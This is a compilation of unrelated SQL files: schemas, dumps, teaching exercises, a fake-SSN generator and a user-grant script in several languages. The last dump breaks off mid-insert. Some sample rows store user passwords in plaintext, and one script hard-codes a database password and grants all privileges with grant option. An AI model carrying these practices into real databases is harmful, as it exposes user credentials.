`create_time` TIMESTAMP NOT NULL COMMENT '创建时间', PRIMARY KEY (seckill_id, user_phone), /*联合主键*/ KEY idx_create_time(create_time) ) ENGINE = INNODB COMMENT ='秒杀成功明细表'; CREATE TABLE t_comments ( coid INTEGER AUTO_INCREMENT NOT NULL, cid INTEGER DEFAULT 0 NOT NULL, created INTEGER(10) NOT NULL, author VARCHAR(200) NOT NULL, author_id INTEGER(10) DEFAULT 0, owner_id INTEGER(10) DEFAULT 0, mail VARCHAR(200) NOT NULL, url VARCHAR(200), ip VARCHAR(64), agent VARCHAR(200), content TEXT NOT NULL, type VARCHAR(16), status VARCHAR(16), parent INTEGER(10) DEFAULT 0, PRIMARY KEY (coid) ) ENGINE = INNODB DEFAULT CHARSET = utf8 COMMENT ='评论信息表'; CREATE TABLE t_contents ( cid INTEGER AUTO_INCREMENT, title VARCHAR(255) NOT NULL, slug VARCHAR(255), thumb_img VARCHAR(255), created INTEGER(10) NOT NULL, modified INTEGER(10), content TEXT, author_id INTEGER(10) NOT NULL, type VARCHAR(16) NOT NULL, status VARCHAR(16) NOT NULL, fmt_type VARCHAR(16) DEFAULT 'markdown', tags VARCHAR(200), categories VARCHAR(200), hits INTEGER(10) DEFAULT 0, comments_num INTEGER(1) DEFAULT 0, allow_comment INTEGER(1) DEFAULT 1, allow_ping INTEGER(1), allow_feed INTEGER(1), PRIMARY KEY (cid) ); INSERT INTO t_contents (title, slug, created, modified, content, author_id, type, status, tags, categories, hits, comments_num, allow_comment, allow_ping, allow_feed) VALUES ('1', 'about', 1487853610, 1487872488, '### Hello World这是我的关于页面### 当然还有其他具体你来写点什么吧', 1, 'page', 'publish', NULL, NULL, 0, 0, 1, 1, 1); DROP TABLE IF EXISTS t_attach; CREATE TABLE t_attach ( id INTEGER AUTO_INCREMENT NOT NULL, fname VARCHAR(100) NOT NULL, ftype VARCHAR(50), fkey VARCHAR(100) NOT NULL, author_id INTEGER(10) NOT NULL, created INTEGER(10) NOT NULL, PRIMARY KEY (id) ); DROP TABLE IF EXISTS t_logs; CREATE TABLE t_logs ( id INTEGER AUTO_INCREMENT NOT NULL, action VARCHAR(100) NOT NULL, data VARCHAR(2000), author_id INTEGER(10) NOT NULL, ip VARCHAR(20), created INTEGER(10) NOT NULL, PRIMARY KEY (id) ); DROP TABLE IF EXISTS t_metas; CREATE TABLE t_metas ( mid INTEGER AUTO_INCREMENT NOT NULL, name VARCHAR(200) NOT NULL, slug VARCHAR(200), type VARCHAR(32) NOT NULL, description VARCHAR(255), sort INTEGER(4) DEFAULT 0, parent INTEGER(10) DEFAULT 0, PRIMARY KEY (mid) ); INSERT INTO t_metas (name, slug, type, description, sort, parent) VALUES ('默认分类', NULL, 'category', NULL, 0, 0); DROP TABLE IF EXISTS t_options; CREATE TABLE t_options ( name VARCHAR(100) PRIMARY KEY NOT NULL, value TEXT, description VARCHAR(255) ); DROP TABLE IF EXISTS t_relationships; CREATE TABLE t_relationships ( cid INTEGER(10) NOT NULL, mid INTEGER(10) NOT NULL ); INSERT INTO t_relationships (cid, mid) VALUES (2, 1); DROP TABLE IF EXISTS t_users; CREATE TABLE t_users ( uid INTEGER PRIMARY KEY NOT NULL, username VARCHAR(64) UNIQUE NOT NULL, password VARCHAR(64) NOT NULL, email VARCHAR(100), home_url VARCHAR(255), screen_name VARCHAR(100), created INTEGER(10) NOT NULL, activated INTEGER(10), logged INTEGER(10), group_name VARCHAR(16) ); -- SHOW CREATE TABLE seckill;#显示表的创建信息
DROP DATABASE IF EXISTS TestFoodForAll; CREATE DATABASE TestFoodForAll; USE TestFoodForAll; CREATE TABLE DinnerGuest ( dinnerGuestId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, firstName CHAR(45) NOT NULL, lastName CHAR(45) NOT NULL, eMailAddress VARCHAR(60) NULL, phone VARCHAR(15) NULL ); CREATE TABLE Allergy ( allergyId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `name` CHAR(100) NOT NULL ); CREATE TABLE DinnerGuestAllergy ( dinnerGuestId INT, allergyId INT, PRIMARY KEY(dinnerGuestId, allergyId) ); ALTER TABLE DinnerGuestAllergy ADD CONSTRAINT fk_PersonAllergy_DinnerGuest FOREIGN KEY (dinnerGuestId) REFERENCES DinnerGuest(dinnerGuestId); ALTER TABLE DinnerGuestAllergy ADD CONSTRAINT fk_DinnerGuestAllergy_Allergy FOREIGN KEY (allergyId) REFERENCES Allergy(allergyId); CREATE TABLE Intolerance ( intoleranceId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `name` CHAR(100) NOT NULL ); CREATE TABLE DinnerGuestIntolerance ( dinnerGuestId INT, intoleranceId INT, PRIMARY KEY(dinnerGuestId, intoleranceId) ); ALTER TABLE DinnerGuestIntolerance ADD CONSTRAINT fk_DinnerGuestIntolerance_DinnerGuest FOREIGN KEY (dinnerGuestId) REFERENCES DinnerGuest(dinnerGuestId); ALTER TABLE DinnerGuestIntolerance ADD CONSTRAINT fk_DinnerGuestIntolerance_Intolerance FOREIGN KEY (intoleranceId) REFERENCES Intolerance(intoleranceId); CREATE TABLE FoodAversion ( foodAversionId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `name` CHAR(100) NOT NULL ); CREATE TABLE DinnerGuestFoodAversion ( dinnerGuestId INT, foodAversionId INT, PRIMARY KEY(dinnerGuestId, foodAversionId) ); ALTER TABLE DinnerGuestFoodAversion ADD CONSTRAINT fk_DinnerGuestFoodAversion_DinnerGuest FOREIGN KEY (dinnerGuestId) REFERENCES DinnerGuest(dinnerGuestId); ALTER TABLE DinnerGuestFoodAversion ADD CONSTRAINT fk_DinnerGuestFoodAversion_FoodAversion FOREIGN KEY (foodAversionId) REFERENCES FoodAversion(foodAversionId); CREATE TABLE Recipe ( recipeId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `name` VARCHAR(100) NOT NULL ); CREATE TABLE Ingredient ( ingredientId INT NOT NULL AUTO_INCREMENT PRIMARY KEY, `name` VARCHAR(100) NOT NULL ); CREATE TABLE RecipeIngredient ( recipeId INT, ingredientId INT, PRIMARY KEY(recipeId, ingredientId) ); ALTER TABLE RecipeIngredient ADD CONSTRAINT fk_RecipeIngredient_Recipe FOREIGN KEY (recipeId) REFERENCES Recipe(recipeId); ALTER TABLE RecipeIngredient ADD CONSTRAINT fk_RecipeIngredient_Ingredient FOREIGN KEY (ingredientId) REFERENCES Ingredient(ingredientId); insert into Allergy (name) values ('Nut'), ('Milk'), ('Wheat'), ('Soy'), ('Fish'), ('Shellfish'), ('Honey'), ('Bacon'); insert into Intolerance (name) values ('Dairy'), ('Eggs'), ('Peanuts'), ('Gluten'), ('Corn'), ('Shellfish'), ('Soy'), ('Beef'); insert into FoodAversion (name) values ('Tomatoes'), ('Eggs'), ('Meat'), ('Coffee'), ('Onions'), ('Garlic'), ('Mushroom'), ('Liver');
-- MySQL dump 10.16 Distrib 10.1.13-MariaDB, for Linux (i686) -- -- Host: localhost Database: TiendaWeb -- ------------------------------------------------------ -- Server version 10.1.13-MariaDB /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `clientes` -- DROP TABLE IF EXISTS `clientes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `clientes` ( `IdCliente` int(11) NOT NULL AUTO_INCREMENT, `Nombre` varchar(60) NOT NULL, `Apellido` varchar(60) NOT NULL, `Continentes` int(11) NOT NULL, `Usuario` varchar(80) NOT NULL, `Contraseña` varchar(80) NOT NULL, `FechaNacimiento` date NOT NULL, `FechaRegistro` date NOT NULL, `Edad` varchar(2) AS (FechaRegistro-FechaNacimiento) VIRTUAL, PRIMARY KEY (`Usuario`), UNIQUE KEY `IdCliente` (`IdCliente`), KEY `Continentes` (`Continentes`), CONSTRAINT `clientes_ibfk_1` FOREIGN KEY (`Continentes`) REFERENCES `continente` (`IdContiente`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `clientes` -- LOCK TABLES `clientes` WRITE; /*!40000 ALTER TABLE `clientes` DISABLE KEYS */; INSERT INTO `clientes` VALUES (3,'Stephany','Perez',5,'Angelloco','wsafrevc5','1990-01-13','2019-08-27','29'),(1,'Gabriel','Arispe',1,'GabrielRobot','wsaft80','1999-07-17','2019-08-27','20'),(2,'Jose','Angel',3,'PerrosVolador','wsafrer67','1997-03-16','2019-08-27','22'); /*!40000 ALTER TABLE `clientes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `compras` -- DROP TABLE IF EXISTS `compras`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `compras` ( `IdCompras` int(11) NOT NULL AUTO_INCREMENT, `UsuarioCliente` varchar(80) NOT NULL, `SerialEquipo` varchar(30) NOT NULL, `FechaCompra` date NOT NULL, PRIMARY KEY (`IdCompras`), KEY `UsuarioCliente` (`UsuarioCliente`), KEY `SerialEquipo` (`SerialEquipo`), CONSTRAINT `compras_ibfk_1` FOREIGN KEY (`UsuarioCliente`) REFERENCES `clientes` (`Usuario`), CONSTRAINT `compras_ibfk_2` FOREIGN KEY (`SerialEquipo`) REFERENCES `equipos` (`Serial`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `compras` -- LOCK TABLES `compras` WRITE; /*!40000 ALTER TABLE `compras` DISABLE KEYS */; INSERT INTO `compras` VALUES (1,'Angelloco','243523dfes','2019-08-27'),(2,'GabrielRobot','24356df23','2019-08-27'),(3,'PerrosVolador','24352sds','2019-08-27'); /*!40000 ALTER TABLE `compras` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `continente` -- DROP TABLE IF EXISTS `continente`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `continente` ( `IdContiente` int(11) NOT NULL AUTO_INCREMENT, `NombreContinente` varchar(35) NOT NULL, PRIMARY KEY (`IdContiente`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `continente` -- LOCK TABLES `continente` WRITE; /*!40000 ALTER TABLE `continente` DISABLE KEYS */; INSERT INTO `continente` VALUES (1,'Asia'),(2,'America'),(3,'Africa'),(4,'Antartida'),(5,'Europa'),(6,'Oceania'); /*!40000 ALTER TABLE `continente` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `equipos` -- DROP TABLE IF EXISTS `equipos`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `equipos` ( `Serial` varchar(30) NOT NULL, `Nombre` varchar(60) NOT NULL, `Tipo_Equipo` varchar(2) NOT NULL, `NGama` int(11) NOT NULL, `CantidadDisponible` int(11) NOT NULL, `Precio` float NOT NULL, PRIMARY KEY (`Serial`), KEY `Tipo_Equipo` (`Tipo_Equipo`), KEY `NGama` (`NGama`), CONSTRAINT `equipos_ibfk_1` FOREIGN KEY (`Tipo_Equipo`) REFERENCES `tipo` (`IdTipo`), CONSTRAINT `equipos_ibfk_2` FOREIGN KEY (`NGama`) REFERENCES `gama` (`Nivel`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `equipos` -- LOCK TABLES `equipos` WRITE; /*!40000 ALTER TABLE `equipos` DISABLE KEYS */; INSERT INTO `equipos` VALUES ('243523dfes','Samsumg Galaxy S10','T',3,5,100.99),('24352sds','Laptops Hp Pavilton','C',2,5,50.5),('24356df23','Audifonos Beast','A',1,15,60.5); /*!40000 ALTER TABLE `equipos` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `gama` -- DROP TABLE IF EXISTS `gama`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `gama` ( `Nivel` int(11) NOT NULL, `DescripcionGama` varchar(20) NOT NULL, PRIMARY KEY (`Nivel`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `gama` -- LOCK TABLES `gama` WRITE; /*!40000 ALTER TABLE `gama` DISABLE KEYS */; INSERT INTO `gama` VALUES (1,'Alta'),(2,'Media'),(3,'Baja'); /*!40000 ALTER TABLE `gama` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `tipo` -- DROP TABLE IF EXISTS `tipo`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `tipo` ( `IdTipo` varchar(2) NOT NULL, `DescripcionTipo` varchar(30) NOT NULL, PRIMARY KEY (`IdTipo`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `tipo` -- LOCK TABLES `tipo` WRITE; /*!40000 ALTER TABLE `tipo` DISABLE KEYS */; INSERT INTO `tipo` VALUES ('A','Audiculares'),('C','Computadoras'),('H','Hardaware'),('T','Telefonos'); /*!40000 ALTER TABLE `tipo` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2019-08-27 8:15:22
DELIMITER // CREATE FUNCTION gen_rnd_ssn() RETURNS CHAR(11) CHARSET utf8 NO SQL BEGIN DECLARE res_ssn VARCHAR(16) DEFAULT ''; /* See https://en.wikipedia.org/wiki/Social_Security_number */ SET @gen_rnd_string_characters := '0123456789'; SET res_ssn := CONCAT(GREATEST(gen_range(1, 665), gen_range(667, 899)), '-', gen_range(1, 99), '-', gen_range(1, 9999)); SET @gen_rnd_string_characters := NULL; RETURN res_ssn; END // DELIMITER ;
SELECT ListPrice FROM ProductAW WHERE ProductID = (SELECT pid FROM (SELECT pid, MAX(qtysum) FROM (SELECT ProductID AS pid, SUM(OrderQty) AS qtysum FROM SalesOrderDetail GROUP BY ProductID) A1) A2);
<서브 쿼리 - 단일 행 서브 쿼리> A-1) 단일 행 서브쿼리 ; 서브쿼리가 하나의 컬럼에서 하나의 행을 검색한다 A-2) 다중 행 서브쿼리 ; 서브쿼리가 하나의 컬럼에서 여러 개의 행을 검색한다 A-3) 다중 열 서브쿼리 ; 서브쿼리가 여러 개의 컬럼을 검색한다 1) 김연아보다 급여를 많이 받는 사원을 검색하세요 SELECT ENO, ENAME FROM EMP WHERE SAL > (SELECT SAL FROM EMP WHERE ENAME='김연아'); 2) '노육'과 평점이 동일한 학생의 정보를 검색하세요 SELECT * FROM STUDENT WHERE AVR = (SELECT AVR FROM STUDENT WHERE SNAME = '노육'); SELECT * FROM STUDENT WHERE AVR IN (SELECT AVR FROM STUDENT WHERE SNAME = '노육'); 3) 김연아와 부서가 다르고 동일한 업무를 하는 사원의 정보를 검색하세요 SELECT * FROM EMP WHERE DNO!=(SELECT DNO FROM EMP WHERE ENAME='김연아') AND JOB=(SELECT JOB FROM EMP WHERE ENAME='김연아'); 4) 부서 중 가장 급여를 많이 받는 부서를 검색하세요 SELECT DNO "급여최대부서", ROUND(AVG(SAL)) FROM EMP GROUP BY DNO HAVING AVG(SAL) = (SELECT MAX(AVG(SAL)) FROM EMP GROUP BY DNO); 5) 부서 중 가장 급여를 적게 받는 부서를 검색하세요 SELECT E.DNO "급여최소부서", DNAME, ROUND(AVG(SAL)) FROM EMP E, DEPT D WHERE E.DNO = D.DNO GROUP BY E.DNO, DNAME HAVING AVG(SAL) = (SELECT MIN(AVG(SAL)) FROM EMP GROUP BY DNO); 6) 부산에서 근무하는 사원의 정보를 검색하세요 SELECT * FROM EMP WHERE DNO = (SELECT DNO FROM DEPT WHERE LOC='부산'); SELECT * FROM EMP JOIN DEPT USING(DNO) WHERE LOC = '부산'; SELECT * FROM EMP E, DEPT D WHERE E.DNO = D.DNO AND LOC = '부산';
create user 'sesemesuser'@'localhost' identified by 'sesemesuser3306'; grant all privileges on sesemes.* to 'sesemesuser'@'localhost' with grant option; grant trigger on sesemes.* to 'sesemesuser'@'localhost'; flush privileges;
create or replace FUNCTION NumeroFactImpagadasAlumno(Alumno IN Matriculas.OID_A%TYPE) RETURN NUMBER IS Contador NUMBER; BEGIN SELECT count(distinct FECHADEPAGO) INTO Contador FROM FACTURAS,MATRICULAS WHERE Matriculas.OID_A=Alumno AND PAGADO=0 AND FACTURAS.OID_MAT=MATRICULAS.OID_MAT; RETURN Contador; END;
delete from parking where id >0;
DROP DATABASE IF EXISTS b_amazonDB; CREATE DATABASE b_amazonDB; USE b_amazonDB; CREATE TABLE products ( item_id INTEGER(11) AUTO_INCREMENT NOT NULL, product_name VARCHAR(45) NOT NULL, department_name VARCHAR(45) NOT NULL, price DECIMAL(10,2) NOT NULL, stock_quantity INTEGER(10), PRIMARY KEY (item_id) ); INSERT INTO products (product_name, department_name, price, stock_quantity) VALUES ('Puma', 'Clothing', 100.99, 200); INSERT INTO products (product_name, department_name, price, stock_quantity) VALUES ('SmartPhone', 'Electronics', 1000.99, 1000); INSERT INTO products (product_name, department_name, price, stock_quantity) VALUES ('Harry_Potter', 'Literature', 30.99, 500); INSERT INTO products (product_name, department_name, price, stock_quantity) VALUES ('Flatscreen', 'Electronics', 399.99, 200); INSERT INTO products (product_name, department_name, price, stock_quantity) VALUES ('crockpot', 'Cooking', 199.99, 250); -- ### Alternative way to insert more than one row -- INSERT INTO products (product_name, department_name, price, stock_quantity) -- VALUES ("Puma", clothing, 100.00, 200), ("SmartPhone", Electronics, 1000.00, 1000), ("Harry_Potter", Literature, 30.00, 500), ("Flatscreen", Electronics, 399.99, 200), ("crockpot", cooking, 199.99, 250);
CREATE TABLE `user_annotation` ( `user_id` int(11) NOT NULL DEFAULT '0', `annotation_id` int(11) NOT NULL, `name` varchar(256) DEFAULT NULL, `create_datetime` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, `update_datetime` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, PRIMARY KEY (`user_id`,`annotation_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CALL oracle_pay(9, 11, 0.01, 1, 2, 3, 'ABLEABLEABLE', 0);
DROP TABLE IF EXISTS Anonymisation.ground_truth; DROP DATABASE IF EXISTS Anonymisation; DROP USER IF EXISTS 'anonymisation'@'localhost';
USE studXXXXX; DROP TABLE IF EXISTS `etaty`; CREATE TABLE `etaty` ( `NAZWA` varchar(10) NOT NULL default '', `PLACA_OD` decimal(6,2) default NULL, `PLACA_DO` decimal(6,2) default NULL, PRIMARY KEY (`NAZWA`) ) TYPE=MyISAM; INSERT INTO `etaty` (`NAZWA`, `PLACA_OD`, `PLACA_DO`) VALUES ('PROFESOR', 3000.00, 4000.00), ('ADIUNKT', 2510.00, 3000.00), ('ASYSTENT', 1500.00, 2100.00), ('DOKTORANT', 800.00, 1000.00), ('SEKRETARKA', 1470.00, 1650.00), ('DYREKTOR', 4280.00, 5100.00); DROP TABLE IF EXISTS `pracownicy`; CREATE TABLE `pracownicy` ( `ID_PRAC` decimal(4,0) NOT NULL default '0', `NAZWISKO` varchar(15) default NULL, `IMIE` varchar(15) default NULL, `ETAT` varchar(10) default NULL, `ID_SZEFA` decimal(4,0) default NULL, `ZATRUDNIONY` date default NULL, `PLACA_POD` decimal(6,2) default NULL, `PLACA_DOD` decimal(6,2) default NULL, `ID_ZESP` decimal(2,0) default NULL, PRIMARY KEY (`ID_PRAC`) ) TYPE=MyISAM; INSERT INTO `pracownicy` (`ID_PRAC`, `NAZWISKO`, `IMIE`, `ETAT`, `ID_SZEFA`, `ZATRUDNIONY`, `PLACA_POD`, `PLACA_DOD`, `ID_ZESP`) VALUES (100, 'Marecki', 'Jan', 'DYREKTOR', NULL, '1968-01-01', 4730.00, 980.50, 10), (110, 'Janicki', 'Karol', 'PROFESOR', 100, '1973-05-01', 3350.00, 610.00, 40), (120, 'Nowicki', 'Pawel', 'PROFESOR', 100, '1977-09-01', 3070.00, NULL, 30), (130, 'Nowak', 'Piotr', 'PROFESOR', 100, '1968-07-01', 3960.00, NULL, 20), (140, 'Kowalski', 'Krzysztof', 'PROFESOR', 130, '1975-09-15', 3230.00, 805.00, 20), (150, 'Grzybowska', 'Maria', 'ADIUNKT', 130, '1977-09-01', 2845.50, NULL, 20), (160, 'Krakowska', 'Joanna', 'SEKRETARKA', 130, '1985-03-01', 1590.00, NULL, 20), (170, 'Opolski', 'Roman', 'ASYSTENT', 130, '1992-10-01', 1839.70, 480.50, 20), (190, 'Kotarski', 'Konrad', 'ASYSTENT', 140, '1993-09-01', 1971.00, NULL, 20), (180, 'Makowski', 'Marek', 'ADIUNKT', 100, '1985-02-20', 2610.20, NULL, 10), (200, 'Przywarek', 'Leon', 'DOKTORANT', 140, '1994-07-15', 900.00, NULL, 30), (210, 'Kotlarczyk', 'Stefan', 'DOKTORANT', 130, '1993-10-15', 900.00, 570.60, 30), (220, 'Siekierski', 'Mateusz', 'ASYSTENT', 110, '1993-10-01', 1889.00, NULL, 20), (230, 'Dolny', 'Tomasz', 'ASYSTENT', 120, '1992-09-01', 1850.00, 390.00, NULL); DROP TABLE IF EXISTS `zespoly`; CREATE TABLE `zespoly` ( `ID_ZESP` decimal(2,0) default NULL, `NAZWA` varchar(20) default NULL, `ADRES` varchar(20) default NULL ) TYPE=MyISAM; INSERT INTO `zespoly` (`ID_ZESP`, `NAZWA`, `ADRES`) VALUES (10, 'ADMINISTRACJA', 'PIOTROWO 2'), (20, 'SYSTEMY ROZPROSZONE', 'PIOTROWO 3A'), (30, 'SYSTEMY EKSPERCKIE', 'STRZELECKA 14'), (40, 'ALGORYTMY', 'WIENIAWSKIEGO 16'), (50, 'BADANIA OPERACYJNE', 'MIELZYNSKIEGO 30');
insert into countries(country_id, name) values (1, 'ru'); --insert into countries(country_id, name) values (2, 'en'); --insert into countries(country_id, name) values (3, 'fr'); --insert into countries(country_id, name) values (4, 'sp'); insert into cities(city_id, country_id, name) values (1, 1, 'Moscow'); insert into cities(city_id, country_id, name) values (2, 1, 'StPeterburg'); insert into cities(city_id, country_id, name) values (3, 1, 'Saratov'); --insert into cities(city_id, country_id, name) values (4, 1, 'Madrid'); insert into temperatures(temperature_id, date, temperature_value, city_id) values (1, '2018-08-15', '22.5', 1); insert into temperatures(temperature_id, date, temperature_value, city_id) values (2, '2018-08-16', '23.5', 1); insert into temperatures(temperature_id, date, temperature_value, city_id) values (3, '2018-08-17', '20.0', 1); insert into temperatures(temperature_id, date, temperature_value, city_id) values (4, '2018-08-18', '22.0', 1); insert into temperatures(temperature_id, date, temperature_value, city_id) values (5, '2018-08-19', '21.5', 1); insert into temperatures(temperature_id, date, temperature_value, city_id) values (6, '2018-08-15', '21', 2); insert into temperatures(temperature_id, date, temperature_value, city_id) values (7, '2018-08-16', '22', 2); insert into temperatures(temperature_id, date, temperature_value, city_id) values (8, '2018-08-17', '23', 2); insert into temperatures(temperature_id, date, temperature_value, city_id) values (9, '2018-08-18', '24', 2); insert into temperatures(temperature_id, date, temperature_value, city_id) values (10, '2018-08-19', '26', 2); insert into temperatures(temperature_id, date, temperature_value, city_id) values (11, '2018-08-15', '28', 3); insert into temperatures(temperature_id, date, temperature_value, city_id) values (12, '2018-08-16', '24', 3); insert into temperatures(temperature_id, date, temperature_value, city_id) values (13, '2018-08-17', '28', 3); insert into temperatures(temperature_id, date, temperature_value, city_id) values (14, '2018-08-18', '24', 3); insert into temperatures(temperature_id, date, temperature_value, city_id) values (15, '2018-08-19', '28', 3);
CREATE TABLE tickets( id SERIAL, subject VARCHAR, message TEXT, resolution smallint, school_id INTEGER REFERENCES school(id), created_at TIMESTAMP, updatedd_at TIMESTAMP, deleted VARCHAR, PRIMARY KEY (id) ); CREATE TABLE notifications( id SERIAL, header VARCHAR, message TEXT, school_id INTEGER REFERENCES school(id), class_id INTEGER REFERENCES grade(id), student_id INTEGER REFERENCES student(id), created_at TIMESTAMP, updatedd_at TIMESTAMP, deleted VARCHAR, PRIMARY KEY (id) ); CREATE TABLE fees( id SERIAL, student_name VARCHAR, student_id INTEGER REFERENCES student(id), total_bill_amount NUMERIC(8,2), paid_bill_amount NUMERIC(8,2), pending_amount NUMERIC(8,2), school_id INTEGER REFERENCES school(id), created_at TIMESTAMP, updatedd_at TIMESTAMP, deleted VARCHAR, PRIMARY KEY (id) ); CREATE TABLE attendance( id SERIAL, student_id INTEGER REFERENCES student(id), school_id INTEGER REFERENCES school(id), grade_id INTEGER REFERENCES grade(id), attend_date DATE, status INTEGER, created_at TIMESTAMP, updatedd_at TIMESTAMP, deleted VARCHAR, PRIMARY KEY (id) ); ALTER TABLE cred_manager ADD COLUMN fullname VARCHAR; ALTER TABLE cred_manager ADD COLUMN mobile VARCHAR; ALTER TABLE cred_manager ADD COLUMN city VARCHAR;
-- phpMyAdmin SQL Dump -- version 5.1.1 -- https://www.phpmyadmin.net/ -- -- Servidor: 127.0.0.1 -- Tiempo de generación: 22-08-2021 a las 22:16:43 -- Versión del servidor: 10.4.20-MariaDB -- Versión de PHP: 8.0.9 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; START TRANSACTION; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Base de datos: `bdadministracionapp` -- DELIMITER $$ -- -- Procedimientos -- CREATE DEFINER=`root`@`localhost` PROCEDURE `proc_insert_segmento_usuario` (IN `id` BIGINT, IN `segmento` INT) INSERT INTO tbl_movil_segmento_usuario SELECT u.Id_usuario,s.id FROM tbl_usuarios u INNER JOIN tbl_movil_segmentos s ON u.Id_usuario=id and s.id=segmento$$ DELIMITER ; -- -------------------------------------------------------- -- -- Estructura de tabla para la tabla `tbl_movil_bitacora` -- CREATE TABLE `tbl_movil_bitacora` ( `id` bigint(20) NOT NULL, `usuario_id` bigint(20) NOT NULL, `objeto_id` bigint(20) NOT NULL, `accion` varchar(45) NOT NULL, `descripcion` varchar(255) DEFAULT NULL, `fecha` datetime DEFAULT NULL, `token` varchar(255) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Volcado de datos para la tabla `tbl_movil_bitacora` -- INSERT INTO `tbl_movil_bitacora` (`id`, `usuario_id`, `objeto_id`, `accion`, `descripcion`, `fecha`, `token`) VALUES (1, 75, 128, 'INGRESO', 'A BITÁCORA DEL SISTEMA MÓVIL', '2021-08-16 20:12:53', ''), (2, 75, 15, 'INGRESO', 'A CREAR SEGMENTOS', '2021-08-16 20:28:54', ''), (3, 75, 127, 'inserto', 'INSERT INTO TBL_MOVIL_SEGMENTOS VALUES (NULL,\'EXAMEN\',\'METODOS\',\'75\',SYSDATE())', '2021-08-16 20:28:59', ''), (4, 75, 125, 'Ingreso', 'A llenar Segmento', '2021-08-16 20:28:59', ''), (5, 75, 128, 'INGRESO', 'A CREAR NOTICIA', '2021-08-16 20:31:15', ''), (6, 75, 128, 'INSERTO', 'INSERT INTO TBL_MOVIL_NOTICIAS (TITULO,SUBTITULO,DESCRIPCION,FECHA,FECHA_VENCIMIENTO,REMITENTE,SEGMENTO_ID) VALUES (\'NUEVA\',\'SEGUNDO PARCIAL\',\'HOLA RICCY\',\'2021-08-17 21:32:00\',\'2021-09-18 23:34:00\',\'ADMIN\',1)', '2021-08-16 20:31:56', ''), (7, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:31:57', ''), (8, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:32:03', ''), (9, 75, 123, 'INGRESO', 'A GESTIÓN DE NOTICIAS ', '2021-08-16 20:32:25', ''), (10, 75, 128, 'MODIFICO', 'UPDATE TBL_MOVIL_NOTICIAS SET TITULO = \'NUEVA\', SUBTITULO = \'SEGUNDO PARCIAL\', DESCRIPCION = \'HOLA RICCY\', FECHA = \'2021-08-17 21:32:00\',FECHA_VENCIMIENTO = \'2021-09-18 